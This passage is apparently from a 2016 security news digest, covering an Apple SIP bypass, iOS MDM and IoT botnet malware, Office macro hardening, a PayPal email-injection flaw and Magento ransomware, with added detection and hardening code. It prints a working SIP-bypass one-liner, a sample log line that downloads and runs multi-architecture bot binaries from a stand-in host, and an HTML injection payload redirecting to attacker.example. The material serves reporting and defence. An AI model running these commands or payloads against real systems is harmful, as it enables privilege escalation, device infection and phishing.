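      <key>PayloadType</key><string>com.apple.security.root</string>
      <key>PayloadIdentifier</key><string>example.constructed.rootca</string>
      <key>PayloadContent</key><data>MIIBAAA=</data>
    </dict>
    <dict>
      <key>PayloadType</key><string>com.apple.proxy.http.global</string>
      <key>PayloadIdentifier</key><string>example.constructed.proxy</string>
      <key>ProxyServer</key><string>203.0.113.10</string>
      <key>ProxyServerPort</key><integer>8080</integer>
    </dict>
  </array>
</dict>
</plist>
"""


def audit_profile(profile_bytes):
    """Return [(payload_identifier, payload_type, reason)] for risky payloads.

    Assumes an unsigned XML profile; a CMS-signed .mobileconfig must have its
    signature wrapper stripped before the plist can be parsed.
    """
    profile = plistlib.loads(profile_bytes)
    findings = []
    for payload in profile.get("PayloadContent", []):
        ptype = payload.get("PayloadType", "")
        if ptype in RISKY_PAYLOAD_TYPES:
            findings.append((payload.get("PayloadIdentifier", "?"), ptype,
                             RISKY_PAYLOAD_TYPES[ptype]))
    return findings


def enables_interception(findings):
    """True when the profile both trusts a new root CA and redirects traffic."""
    types = {ptype for _, ptype, _ in findings}
    return "com.apple.security.root" in types and bool(types & TRAFFIC_REDIRECTORS)


if __name__ == "__main__":
    found = audit_profile(SAMPLE_PROFILE)
    for ident, ptype, reason in found:
        print(f"{ident}: {ptype} -> {reason}")
    print("interception-capable:", enables_interception(found))
```

A profile that only adds a Wi-Fi network passes; one that pairs a root CA with a proxy or VPN is the shape to block before the user is asked to trust it.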
The code to bypass Apple System Integrity Protection security mechanism fits in a Tweet
31.3.2016 Apple
Apple failed to fix the System Integrity Protection security mechanism, and the exploit code released by a researcher fits in a Tweet.
Last week security media reported a critical privilege escalation flaw (CVE-2016-1757) in the Apple System Integrity Protection (SIP) security mechanism, a vulnerability that, at the time of discovery, was present in all versions of the OS X operating system.
This week, Apple issued security updates, OS X El Capitan 10.11.4 and iOS 9.3, to solve the problem, but according to the experts the fix was ineffective against the privilege escalation vulnerability.
The flaw was discovered by security researcher Pedro Vilaça from SentinelOne and puts more than 130 million Apple customers at risk. Attackers can exploit the flaw for various purposes; for example, it could be used in a multi-stage attack in which crooks who have already compromised the target system use the flaw to gain persistence on the compromised device.
The SIP is a security mechanism implemented by Apple in the OS X El Capitan operating system for the protection of certain system processes, files and folders from being modified or tampered with by other processes, even when they are executed by a user with root privileges.
According to the experts at SentinelOne, the flaw allows circumventing SIP, bypassing the key security feature without kernel exploits. Apple has now issued a security patch for both OS X El Capitan 10.11.4 and iOS 9.3, but it seems that the update is ineffective, to users’ disappointment.
The critical privilege escalation vulnerability in System Integrity Protection still affects the most recent OS versions for both Macs and iThings.
The popular researcher Stefan Esser has published new exploit code to bypass the latest patched version of System Integrity Protection, and the interesting part is that the code fits in a Tweet.
You heard right: according to Esser, this isn’t the only flaw affecting SIP, and most of them are still unfixed.
“Stefan Esser of German security biz SektionEins also gave a talk at this year’s SyScan360 during which he highlighted a bunch of SIP-related vulnerabilities. Esser told The Register “everything in my slides is unfixed” by Apple in the latest version of OS X 10.11 except for two flaws: the kas_info syscall and a malicious mount.” reported El Reg.
“The evil mount worked by mounting a file system over /System and replacing supposedly SIP-protected core OS utilities with attacker-controlled ones (yes, that really worked). It was fixed in OS X 10.11.2.”
ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot
The above code expands to:
ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
fsck_cs /dev/diskX 1>&-
touch /Library/Extensions/
reboot
Let’s hope Apple fixes all the open SIP issues as soon as possible.
Dangerous flaw in the iOS operating system threatens millions of users
31.3.2016 Vulnerabilities
Security analysts at Check Point have uncovered a new serious vulnerability in Apple's iOS operating system, which is used by iPhone smartphones and iPad tablets. Attackers can abuse the flaw to smuggle practically any malicious code onto a compromised device.
The flaw was given the working name SideStepper. It allows attackers to abuse the communication between an Apple phone or tablet and a so-called MDM system. This is essentially a solution used mainly in companies for the remote installation of applications and the management of Apple devices.
It is precisely because of the flaw in this communication that attackers can do whatever they like with the compromised device. "Attackers can exploit the vulnerability, for example, to remotely install malicious applications and compromise all the data on the device. Potentially, millions of iOS users around the world may be at risk," David Řeháček, security expert at Check Point Software Technologies, told Novinky.cz.
Attacks via SMS and social networks
According to him, a potential attack could look as follows. "First, they convince the user to install a malicious configuration profile, for example via a phishing message. This is a simple and effective attack method that uses proven communication platforms such as SMS, chat programs or e-mail to spread the malicious link. Attackers can then imitate commands that iOS trusts and remotely install further malicious applications," Řeháček added.
Through these they can then eavesdrop on users and capture login credentials and other sensitive data. They can just as well remotely activate the camera or microphone to capture sound and images.
Details of the new vulnerability were published on Thursday afternoon at the Black Hat Asia security conference. Potential cybercriminals thus have in their hands practically everything they need to exploit the flaw.
So far, however, no case of exploitation of the newly discovered vulnerability has been recorded.
Caution is warranted
Although a fix for the SideStepper flaw is still missing, users can quite easily minimize the risk of attack themselves. It is enough not to open SMS messages and e-mails from unknown people; the same applies to messages on social networks and in various chat programs. It is precisely through these channels that cybercriminals attack most often.
Cybercriminals have been focusing on the iOS mobile platform more and more often lately. This month, for example, security experts warned about the AceDeceiver Trojan, which can do considerable mischief on Apple devices. It opens a backdoor into the system for the pirates, giving them access not only to settings but also to user data.
Advanced Malware targeting Internet of the Things and Routers
31.3.2016 Virus
Anything connected to the Internet can be hacked, and so can Internet of Things (IoT) devices.
The market fragmentation of IoT, or Internet-connected, devices is a security nightmare due to the poor security measures implemented by their vendors.
Now, researchers at security firm ESET have discovered a piece of malware that targets embedded devices such as routers, and other connected devices like gateways and wireless access points, rather than computers or smartphones.
Dubbed KTN-Remastered or KTN-RM, the malware is a combination of Tsunami (or Kaiten) and Gafgyt.
Tsunami is a well-known IRC (Internet Relay Chat) bot used by miscreants for launching Distributed Denial of Service (DDoS) attacks while Gafgyt is used for Telnet scanning.
KTN-RM, which researchers dubbed 'Remaiten,' features an improved spreading mechanism: it carries downloader executable binaries for embedded platforms and other connected devices.
How Does the Linux Malware Work?
The malware first performs Telnet scanning to look for routers and smart devices. Once a connection is made, the malware tries to guess the login credentials in an effort to take over weakly secured devices.
If it successfully logs in, the malware will issue a shell command to download bot executable files for multiple system architectures before running them on the compromised networking kit.
"This is a simple but noisy way of ensuring that the new victim gets infected because it is likely that one of the binaries is for the current platform," explained ESET Malware Researcher Michal Malík. "It targets mainly those with weak login credentials."
The malware, version 2.0, also has a welcome message for those who might try to neutralise it, containing a reference to the Malware Must Die blog.
Perhaps it is a way to take revenge, as Malware Must Die has published extensive details about Gafgyt, Tsunami and other members of this Malware family.
For more technical details about KTN-RM or Remaiten, head to ESET's official blog post published Wednesday.
Here's the Exploit to Bypass Apple Security Feature that Fits in a Tweet
31.3.2016 Apple
Did you install the latest update, OS X 10.11.4?
If yes, then you might be surprised to learn that Apple delivered an ineffective patch this time.
Yes! This news will definitely disappoint many Apple users, as the latest updates, OS X El Capitan 10.11.4 and iOS 9.3, still contain a privilege escalation vulnerability that could affect 130 million Apple customers.
Just last week, we reported a critical privilege escalation vulnerability in Apple's System Integrity Protection (SIP) security mechanism, affecting all versions of the OS X operating system.
Even after Apple fixed the critical flaw in the latest round of patches for Macs and iThings, SIP can still be bypassed in the most recent version of the operating system, leaving Apple users vulnerable to flaws that could remotely hijack their machines.
SIP Bypass Exploit Code Fits in a Tweet
Interestingly, Stefan Esser, a security researcher from Germany, has released new exploit code to bypass the latest patched version of SIP, and it fits in a Tweet.
Here's the exploit code. It can be used to modify a crucial OS X configuration file that not even the root user is allowed to touch, reported The Register.
ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot
The above code actually expands to:
ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
fsck_cs /dev/diskX 1>&-
touch /Library/Extensions/
reboot
The above exploit code successfully bypasses Apple's SIP technology, allowing one to run processes as they please.
What is System Integrity Protection (SIP)?
Apple introduced SIP, a security feature in the OS X kernel, with the release of OS X El Capitan; it is designed to restrict the root account of OS X machines and limit the actions a root user can perform on protected parts of the system.
Besides this, System Integrity Protection (SIP) also helps prevent software from changing your startup volume, blocks certain kernel extensions from being loaded and limits the debugging of certain apps.
By default, System Integrity Protection (SIP) protects these folders: /System, /usr, /bin, /sbin, along with the applications that come pre-installed with OS X.
This is a really bad time for Apple and its users. Let's hope that the company will be more vigilant with its upcoming patch update.
The Linux Remaiten malware is building a Botnet of IoT devices
31.3.2016 Virus
Experts at ESET have spotted a new threat in the wild, dubbed Remaiten, that targets embedded systems to recruit them into a botnet.
ESET is actively monitoring malicious code that targets IoT systems such as routers, gateways and wireless access points, rather than computers or smartphones.
Security researchers from ESET have discovered a new threat dubbed KTN-RM or Remaiten that targets Internet of Things devices by combining the capabilities of Linux malware known as Tsunami and Gafgyt.
Tsunami is a downloader/IRC bot backdoor used in the criminal ecosystem to launch DDoS attacks, while Linux/Gafgyt serves as a backdoor that can be controlled remotely and used for Telnet scanning.
“Recently, we discovered a bot that combines the capabilities of Tsunami (also known as Kaiten) and Gafgyt. It also provides some improvements as well as a couple of new features. We call this new threat Linux/Remaiten. So far, we have seen three versions of Linux/Remaiten that identify themselves as versions 2.0, 2.1 and 2.2. Based on artifacts found in the code, the authors call this new malware “KTN-Remastered” or “KTN-RM”.” states the official blog post published by the company.
The KTN-RM malware (aka Remaiten) features an improved spreading mechanism, carrying downloader executable binaries for embedded platforms and other connected devices.
The attack scenario is similar to the one seen in the wild for other IoT threats: the Remaiten malware scans the Internet for IoT devices that accept Telnet connections, then tries to log in to them using a dictionary of login credentials. If the malware successfully logs in to a device, it issues a shell command to download other malicious binaries onto the infected system.
The Linux Remaiten downloaders are small ELF executables embedded in the bot binary itself; they are executed on the target devices to instruct them to connect to the bot’s C&C server. The researchers at ESET discovered that the bot binaries include a hardcoded list of C&C server IP addresses; the bot also sends the control server information about the infected device (i.e. IP address, login credentials, infection status).
“When instructed to perform telnet scanning, it tries to connect to random IP addresses reachable from the Internet on port 23. If the connection succeeds, it will try to guess the login credentials from an embedded list of username/password combinations. If it successfully logs in, it issues a shell command to download bot executables for multiple architectures and tries to run them. This is a simple albeit noisy way of infecting new victims, as it is likely one of the binaries will execute on the running architecture.” states the post.
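The spreading behaviour quoted here, and in the earlier ESET write-up above (Telnet scanning, credential guessing, then a shell command fetching binaries for several architectures), is noisy enough to detect from a Telnet honeypot or device log. The detection logic below is an added example and not ESET's code; the log layout, the thresholds and the sample lines are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed Telnet honeypot log lines (not real data). The first source guesses
# credentials, logs in and fetches binaries for several CPU architectures, the
# "simple but noisy" pattern described by ESET; the second is a normal operator.
SAMPLE_LOG = """\
2016-03-30T10:00:01Z src=198.51.100.7 dport=23 event=login_failed user=root pass=root
2016-03-30T10:00:02Z src=198.51.100.7 dport=23 event=login_failed user=root pass=admin
2016-03-30T10:00:03Z src=198.51.100.7 dport=23 event=login_failed user=admin pass=admin
2016-03-30T10:00:04Z src=198.51.100.7 dport=23 event=login_failed user=root pass=12345
2016-03-30T10:00:05Z src=198.51.100.7 dport=23 event=login_failed user=admin pass=password
2016-03-30T10:00:06Z src=198.51.100.7 dport=23 event=login_ok user=admin pass=1234
2016-03-30T10:00:07Z src=198.51.100.7 dport=23 event=cmd cmd="cd /tmp; wget http://203.0.113.5/x86; wget http://203.0.113.5/mips; wget http://203.0.113.5/arm; chmod +x x86 mips arm; ./x86; ./mips; ./arm"
2016-03-30T10:05:00Z src=192.0.2.44 dport=23 event=login_ok user=operator pass=********
2016-03-30T10:05:03Z src=192.0.2.44 dport=23 event=cmd cmd="show interfaces"
"""

# Assumed log layout: "<ts> src=<ip> dport=<port> event=<name> [key=value ...]".
LINE_RE = re.compile(r'^(?P<ts>\S+) src=(?P<src>\S+) dport=(?P<dport>\d+) '
                     r'event=(?P<event>\S+)(?: (?P<rest>.*))?$')
CMD_RE = re.compile(r'cmd="(?P<cmd>.*)"$')

# Fetch tools typically available on BusyBox-based embedded devices.
DOWNLOAD_TOOLS = ("wget", "tftp", "curl", "busybox")
# Architecture names commonly used as file names by multi-platform IoT droppers.
ARCH_HINTS = ("x86", "i686", "mips", "arm", "ppc", "sh4", "sparc", "m68k")


def parse_line(line):
    """Parse one log line into a dict (None if it does not match the layout)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    cmd = CMD_RE.search(rec["rest"] or "")
    rec["cmd"] = cmd.group("cmd") if cmd else None
    return rec


def summarise(log_text, port=23):
    """Aggregate per-source Telnet activity: failed logins, success, commands."""
    per_src = defaultdict(lambda: {"failed_logins": 0, "logged_in": False, "cmds": []})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or int(rec["dport"]) != port:
            continue
        s = per_src[rec["src"]]
        if rec["event"] == "login_failed":
            s["failed_logins"] += 1
        elif rec["event"] == "login_ok":
            s["logged_in"] = True
        elif rec["event"] == "cmd" and rec["cmd"]:
            s["cmds"].append(rec["cmd"])
    return dict(per_src)


def architectures_in(cmd):
    """Distinct architecture hints in a command. Substring heuristic, so a word
    like 'alarm' would count as 'arm': fine for triage, not for auto-blocking."""
    return {a for a in ARCH_HINTS if a in cmd}


def flag_sources(summary, fail_threshold=5):
    """Return {src: [reasons]} for sources showing Remaiten-style behaviour."""
    flagged = {}
    for src, s in summary.items():
        reasons = []
        if s["failed_logins"] >= fail_threshold:
            reasons.append("credential guessing over Telnet")
        if s["logged_in"]:
            downloads = [c for c in s["cmds"] if any(t in c for t in DOWNLOAD_TOOLS)]
            if downloads:
                reasons.append("post-login download command")
            archs = set()
            for c in downloads:
                archs |= architectures_in(c)
            if len(archs) >= 2:
                reasons.append("multi-architecture payload drop: " + ", ".join(sorted(archs)))
        if reasons:
            flagged[src] = reasons
    return flagged


if __name__ == "__main__":
    for src, reasons in flag_sources(summarise(SAMPLE_LOG)).items():
        print(src, "->", "; ".join(reasons))
```

The multi-architecture rule is the most specific of the three: a legitimate administrator has no reason to fetch and execute three binaries built for different CPUs in one session.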
The researchers also revealed a curiosity about the malware: the C&C server used for version 2.0 displays a welcome message that references the MalwareMustDie blog; let’s consider it a sort of revenge by the author on the popular team of researchers.
Take a look at the report published by ESET for more technical details about the Remaiten malware.
Microsoft adds Linux Bash Shell and Ubuntu Binaries to Windows 10
31.3.2016 Safety
'Microsoft loves Linux' so much that the company is now bringing the popular Bash shell, alongside the entire Linux command environment, to its newest Windows 10 OS in the upcoming 'Anniversary Update,' Redstone.
The rumours before Microsoft’s Build 2016 developer conference were true. Microsoft has just confirmed that it is going to enable its users to run Bash (Bourne Again Shell) natively on Windows 10.
Microsoft has partnered with Ubuntu's parent company Canonical to ensure that the Bash experience for users is just as good on Windows as it is on variants of Linux.
Although the goal of the partnership, in the end, is to bring Ubuntu to Windows 10, don't expect it to run Ubuntu directly on Windows 10.
Users will be able to download Bash from the Windows Store. Bash, or Bourne Again Shell, is capable of handling advanced command-line functionality that is not a cup of tea for PowerShell or CMD.
"The Bash shell is coming to Windows. Yes, the real Bash is coming to Windows," said Microsoft's Kevin Gallo at the Build 2016 keynote. "This is not a VM [Virtual Machine]. This is not cross-compiled tools. This is native."
There already exist third-party apps that implement a Bash shell on Windows, such as Cygwin or MSYS. But the new move by Microsoft would eliminate the need for third-party utilities, offering even more flexibility for developers who prefer using these binaries and tools.
How to Run Bash on Windows?
Users just have to follow these simple steps to run Bash on Windows 10 OS:
Open the Windows Start menu
Type "bash"
Hit 'Enter'
This will open a command-line console (cmd.exe) running Ubuntu's /bin/bash, Dustin Kirkland, a member of Canonical's Ubuntu Product and Strategy team, explains in a blog post.
The system features a full Ubuntu user space complete with support for tools including ssh, apt, rsync, find, grep, awk, sed, sort, xargs, md5sum, gpg, curl, wget, apache, mysql, python, perl, ruby, php, vim, emacs and more.
This is not Microsoft Linux for Windows
Don’t get confused: Microsoft is not enabling Linux applications to run on top of Windows, nor is this "Microsoft Linux." The company is just providing support for Bash on Windows 10 as an expansion of its command-line tool family.
So, the company is working on integrating the Ubuntu user space in Windows 10; a hacker had already spotted a Linux subsystem in a preview build (build 14251) of Windows 10 in late January.
As Kirkland writes:
"So just Ubuntu running in a virtual machine?" Nope! This isn't a virtual machine at all. There's no Linux kernel booting in a VM under a hypervisor. It's just the Ubuntu user space. "Ah, okay, so this is Ubuntu in a container then?" Nope! This isn't a container either.
It's native Ubuntu binaries running directly in Windows. "Hum, well it's like cygwin perhaps?" Nope! Cygwin includes open source utilities that are recompiled from source to run natively in Windows. Here, we're talking about bit-for-bit, checksum-for-checksum Ubuntu ELF binaries running directly in Windows.
This isn't Microsoft's first step towards implementing Linux functionality in Windows. Just last year, Microsoft worked on the Linux kernel and made a Linux OS called Azure Cloud Switch. It also chose Ubuntu as the operating system for its cloud-based Big Data services.
Marine Corps Cyberspace Warfare Group, the new hacker unit
31.3.2016 Safety
The United States Marine Corps launched a new hacker support unit, the Marine Corps Cyberspace Warfare Group, on March 25th.
It is unnecessary to stress the importance of cyber capabilities in the current military environment. Governments and military corps are investing to improve their cyber abilities and exploit the immense possibilities offered by cyberspace as the fifth domain of warfare.
News of the day is that the United States Marine Corps launched a new hacker support unit on March 25th; it follows the establishment of other hacking units announced last year.
It is a strategic decision in response to the rapid technological evolution of the military context; the Marine Corps Cyberspace Warfare Group (MCCYWG) is already operational, and the resources assigned to it are expected to expand rapidly next year.
The newborn Marine Corps Cyberspace Warfare Group will support US Marine Corps Forces Cyberspace (MARFORCYBER), established by the US Government in 2010.
The new Marine Corps Cyberspace Warfare Group will train and support hackers working for the US Marine Corps; its members will be involved in both offensive and defensive operations.
“The mission of MCCYWG is to man, train and equip Marine Cyberspace mission teams to perform both defensive and offensive cyber operations in support of United States Cyber Command and Marine Forces Cyberspace Command.” states the official website of US Marine Corps.
“We’ve always had the means to communicate and the means to protect that communication, but today we’re in an environment where those methods are more and more reliant on a system of transmissions, routers and networks,” said Col. Ossen J. D’Haiti, the commanding officer of MCCYWG. “So, the ability to protect that, the ability to control that and deny an adversary to interdict that, is crucial to command and control.”
The official announcement remarks that now more than ever, the Marine Corps sees the need to defend its networks and communications. The Marine Corps Cyberspace Warfare Group will protect the Marine Corps infrastructure from cyber attacks; for this reason, the announcement describes it as a sort of virtual “firewall” against cyber threats.
“Cyber operations as a whole are anything from ensuring your network is secure to home use like when you buy a router, set it up, set up passwords and encryptions,” said Sergeant Brian Mueller, a member of the unit.
“[Cyberspace operations] ensure that our systems are secure to stop hackers from getting into our systems where our personal identifiable information and everything else is stored,” added Mueller.
“While the offensive side is what can we do to hinder an enemy.”
Below is the official description of the new hacker unit and its functions:
“Commander, MCCYWG organizes, trains, equips, provides administrative support, manages readiness, and recommends certification and presentation of Cyber Mission Force (CMF) Teams to U.S. Cyber Command. The MCCYWG plans and conducts full spectrum cyberspace operations as directed by COMMARFORCYBER in support of service, combatant command, joint, and coalition requirements.” states the website of the US Marine Corps.
Key MCCYWG tasks include:
Conduct personnel management to organize and assign individuals to work roles and place them in work centers to ensure operational readiness of CMF Teams
Ensure all personnel are trained in accordance with USCYBERCOM Joint Cyberspace Training and Certification Standards and equipped to perform all duties and tasks outlined in the MARFORCYBER Mission Essential Task List (METL)
Plan for and, when authorized, conduct OCO including computer network exploitation (CNE), cyberspace intelligence, surveillance, and reconnaissance (ISR) and operational preparation of the environment (OPE)
Plan and conduct designated DCO in response to threats against the MCEN, supported combatant command (COCOM) designated networks, and the Department of Defense Information Network (DODIN)
Advise COMMARFORCYBER on force employment considerations
Provide subject matter expertise for operational planning requirements
Enable this New Setting to Secure your Computer from Macro-based Malware
31.3.2016 Virus
Do you deal with MS Word files on a daily basis?
If yes, then are you aware that even opening a simple doc file could compromise your system?
Think about it: the virus does not directly affect you; it is you who let the virus carry out the attack by enabling deadly "Macros" to view the contents of a document, which is generally on an eye-catching subject like a bank invoice.
How Are Macros Crippling Your System?
The concept of Macros dates back to the 1990s. You must be familiar with this message: "Warning: This document contains macros."
A Macro is a series of commands and actions that help automate some tasks. Microsoft Office programs support Macros written in Visual Basic for Applications (VBA), but they can also be used for malicious activities like installing malware.
Hackers are cleverly using this technique under the cover of social engineering, sending malicious Macros in doc files or spreadsheets with eye-catching subjects by e-mail to corporate networks.
Once a user opens the malicious Word document, the doc file is downloaded to the system. However, the danger comes when the user opens the file and a popup window appears stating that the user must click "Enable Editing" to view the content.
Once the user clicks through and enables macros, the macro runs with the user's privileges and does whatever its payload defines: typically it downloads and installs further malware, and it may copy itself into other documents to spread across the network.
Dridex and Locky are Warning Bells!!!
Dridex and Locky are the clearest recent illustrations of the threat: both were delivered by malicious macros.
The Dridex banking malware, spread through macro-laden documents, was linked to the theft of an estimated £20 million from UK bank accounts, and Locky ransomware infections grew exponentially within hours of its first appearance.
How to Protect Yourself from Macro-based Malware?
Step 1: Configure Trusted Location
Disabling macros outright is often not feasible in an office environment, where macros exist precisely to automate complex tasks.
If your organization relies on macros, put the files that use them into a designated folder configured as a Trusted Location, and confine macro execution to that folder.
To configure the trusted location, you can navigate via:
User Configuration/Administrative Templates/Microsoft Office XXX 20XX/Application Settings/Security/Trust Center/Trusted Locations
Together with a macro setting that disables macros, this means a macro runs only when its document is opened from the trusted location; a document opened from anywhere else, such as a mail attachment saved to Downloads, cannot run them. Keep the trusted folder somewhere an attacker cannot write to, since anything placed there is implicitly trusted.
Step 2: Block Macros in Office Files that came from the Internet
Microsoft recently added a security feature to Office 2016 that limits macro execution and closes this attack path.
The feature is a Group Policy setting that lets enterprise administrators block macros from running in Office files that come from the Internet.
The new setting is called, "Block macros from running in Office files from the Internet" and can be navigated through the group policy management editor under:
User configuration > Administrative templates > Microsoft Word 2016 > Word Options > Security > Trust Center
It can be configured for each Office application.
By enabling this option, macros that come from the Internet are blocked from running even if you have 'enable all macros' in the Macros Settings.
Moreover, instead of the usual 'Enable Content' button, the user sees a notification that macros have been blocked because the document comes from an untrusted source.
Office decides that a file "comes from the Internet" by the Mark-of-the-Web that browsers and mail clients attach to downloaded files, so the block holds as long as that mark is present. The supported way to run macros in such a file is to save it to a Trusted Location, which allows them to run.
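As an added example (not code from the article or from Microsoft), the following PowerShell applies both steps for the current user by writing the registry values that the Office 2016 policy templates write, and shows how to read the Mark-of-the-Web that the second setting keys on. The Office version key, the trusted folder path and the document name are assumptions; in a domain the same settings are normally pushed through the Group Policy paths quoted above rather than by script.

```powershell
# Added example (not from the original article): apply both steps above for one
# user by writing the registry values that the Office 2016 Group Policy templates
# write, then show how Office decides that a file "came from the Internet".
# Assumptions: Office 2016 (version key 16.0) and C:\CorpMacros as the approved
# folder; both are placeholders to adjust.
$OfficeVersion = '16.0'
$TrustedFolder = 'C:\CorpMacros\'

foreach ($app in 'Word', 'Excel', 'PowerPoint') {
    $sec = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\$app\Security"
    New-Item -Path $sec -Force | Out-Null

    # Step 2: "Block macros from running in Office files from the Internet" (1 = block).
    # Takes precedence over VBAWarnings for any file carrying the Mark-of-the-Web.
    Set-ItemProperty -Path $sec -Name 'blockcontentexecutionfrominternet' -Value 1 -Type DWord

    # Macro setting for everything else. 4 = disable all without notification
    # (1 = enable all, 2 = disable with notification, 3 = digitally signed only).
    Set-ItemProperty -Path $sec -Name 'VBAWarnings' -Value 4 -Type DWord

    # Step 1: a policy-defined Trusted Location. Files opened from here (and its
    # subfolders) are exempt from VBAWarnings, so their macros still run.
    $loc = "$sec\Trusted Locations\Location1"
    New-Item -Path $loc -Force | Out-Null
    Set-ItemProperty -Path $loc -Name 'Path'            -Value $TrustedFolder -Type String
    Set-ItemProperty -Path $loc -Name 'AllowSubfolders' -Value 1 -Type DWord
    Set-ItemProperty -Path $loc -Name 'Description'     -Value 'Approved macro-enabled documents' -Type String
}

# Office recognises a downloaded file by the Zone.Identifier alternate data stream
# that browsers and mail clients attach (ZoneId 3 = Internet, 4 = Restricted).
# Returns $null when the file carries no mark and will be treated as local.
function Get-DownloadZone {
    param([Parameter(Mandatory)][string]$Path)
    $ads = Get-Content -LiteralPath $Path -Stream Zone.Identifier -ErrorAction SilentlyContinue
    foreach ($line in @($ads)) {
        if ($line -match '^ZoneId=(\d+)') { return [int]$Matches[1] }
    }
    return $null
}

# A macro document saved from a mail client to Downloads typically reports 3 and is
# blocked; once an administrator moves it into $TrustedFolder it is allowed to run.
Get-DownloadZone -Path "$env:USERPROFILE\Downloads\invoice.docm"
```

The `VBAWarnings` value is what actually stops macros outside the trusted folder; the trusted location on its own only creates an exemption. Check `Get-DownloadZone` on an attachment a user reports as "blocked" before assuming the policy misfired: a file with no Zone.Identifier stream (for example one extracted by an archiver that strips it) is not covered by the Internet block and falls back to `VBAWarnings`.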
PayPal flaw allowed hackers to send malicious emails
31.3.2016 Virus
PayPal has just fixed a security vulnerability that could have been exploited to send malicious emails to users via its platform.
Researchers at security firm Vulnerability Lab discovered a filter bypass and an application-side input validation flaw that allowed attackers to inject malicious code into emails sent by the PayPal platform.
“A persistent input validation & mail encoding web vulnerability has been discovered in the official PayPal Inc online-service web-application. The validation and mail encoding web vulnerability allows remote attackers to inject their own malicious script codes into the mail header of the portal mails,” states the post published by Vulnerability Lab.
When PayPal users create a new account, they can link multiple email addresses to it. Each address has to be confirmed by entering a confirmation code that PayPal sends to that address.
Unfortunately, an attacker could create an account and insert arbitrary HTML code in the account owner name field.
The attack scenario is simple: the attacker links the new account to the victim's email address and puts malicious code in the account owner name. The platform then sends a confirmation email to the victim's address, and the message carries the injected markup, which is rendered (and, depending on the mail client, executed) when the victim opens it.
The attack is particularly insidious because the emails come from the legitimate PayPal platform, from the service[@]paypal.com address, so they are not flagged as spam or malicious by mail defenses.
This could be exploited in phishing campaigns, for session hijacking, and to redirect users to domains controlled by the attacker.
Vulnerability Lab published a proof-of-concept video demonstrating the issue.
Vulnerability Lab reported the issue to PayPal in October 2015; the vulnerability was fixed this month and the details were disclosed on Wednesday. PayPal awarded researcher Kunz Mejri of Vulnerability Lab $1,000.
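The root cause described above is a user-controlled value (the account owner name) being dropped into an outgoing email without encoding. As an added example, not PayPal's code and not the researcher's proof of concept, the following PowerShell builds the same confirmation message twice, once the vulnerable way and once with the checks a mail template should have. The template wording, recipient address and confirmation code are constructed for the example.

```powershell
# Added example, not PayPal's code: the bug above is a user-controlled value (the
# account owner name) placed into an HTML email without encoding. The two
# functions build the same confirmation mail; only the hardened one is safe.
# Template wording, the recipient address and the code are constructed here.

function New-ConfirmationMailVulnerable {
    param([string]$OwnerName, [string]$Recipient, [string]$Code)
    # Raw interpolation: markup in $OwnerName becomes part of the mail body, and a
    # CR/LF in it lets the sender append headers of their own after the Subject.
    [pscustomobject]@{
        To      = $Recipient
        Subject = "$OwnerName added this address to a PayPal account"
        Body    = "<p>$OwnerName has added $Recipient to a PayPal account.</p><p>Your confirmation code is <b>$Code</b>.</p>"
    }
}

function New-ConfirmationMailHardened {
    param([string]$OwnerName, [string]$Recipient, [string]$Code)
    # Header fields must never carry CR or LF; reject rather than strip so the
    # attempt is visible in logs.
    foreach ($field in $OwnerName, $Recipient) {
        if ($field -match '[\r\n]') { throw "Line break in mail field: $field" }
    }
    # Length-limit and HTML-encode every user-controlled value before it enters HTML.
    $name = if ($OwnerName.Length -gt 64) { $OwnerName.Substring(0, 64) } else { $OwnerName }
    $safeName = [System.Net.WebUtility]::HtmlEncode($name)
    $safeTo   = [System.Net.WebUtility]::HtmlEncode($Recipient)
    $safeCode = [System.Net.WebUtility]::HtmlEncode($Code)
    [pscustomobject]@{
        To      = $Recipient
        Subject = "$name added this address to a PayPal account"
        Body    = "<p>$safeName has added $safeTo to a PayPal account.</p><p>Your confirmation code is <b>$safeCode</b>.</p>"
    }
}

# A "name" that is really a redirect to a phishing page, as an attacker would register it.
$payload = '<img src=x onerror="location=''https://attacker.example/login''">'
(New-ConfirmationMailVulnerable -OwnerName $payload -Recipient 'victim@example.com' -Code '123456').Body
(New-ConfirmationMailHardened   -OwnerName $payload -Recipient 'victim@example.com' -Code '123456').Body
# The first body contains a live <img> tag; the second shows it as &lt;img ... &gt; text.
```

Encoding at the point where the value enters HTML is the fix; filtering "bad tags" on input is what the report calls a filter bypass waiting to happen. The CR/LF check matters separately because the same name also lands in the Subject header, and header injection needs no HTML at all.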
The KimcilWare Ransomware targets Magento Platforms
31.3.2016 Virus
Security experts from the MalwareHunterTeam have spotted a new strain of ransomware, called KimcilWare, specifically designed to target web servers, and more specifically Magento e-commerce platforms.
“A new ransomware called KimcilWare has been discovered that appears to be targeting web sites using the Magento eCommerce solution. It is currently unknown how these sites are being compromised, but victims will have their web site files encrypted using a Rijndael block cipher and then ransomed for anywhere between $140 USD and $415 USD depending on the variant that infected them. Unfortunately, at this time there is no way to decrypt the data for free.” states a blog post published on BleepingComputer.
KimcilWare encrypts the files of the Magento installation and is easy to recognize because it appends the “.kimcilware” extension to each encrypted file, rendering the store useless.
“One script will encrypt all data on the web site and append the .kimcilware extension to all encrypted files. It will also insert a index.html file that displays the ransom note shown above. The KimcilWare variant has a ransom amount of $140 USD. You can see an example of a folder encrypted with the KimcilWare script below. ” continues BleepingComputer.
(Image source: BleepingComputer)
The malware also replaces the site's index file with a page informing the victim that the server has been encrypted.
“Webserver Encrypted” states the message on the home page “Your webserver files has been encrypted with a unix algorithm encryptor. You must paw 140$ to decrypt your webserver files. Payment via Bitcoin only. For more information contact me at tuyuljahat@hotmail.com.”
Of course, the e-commerce becomes useless once the malware has encrypted all the files.
The bad news is that the infection vector is still unknown; fortunately, the number of infections so far is limited.
The KimcilWare ransomware was first reported on March 3 by the owner of a Magento store (version 1.9.1.0) on StackExchange. The administrator noticed that only one site on a server with multiple Magento instances was infected.
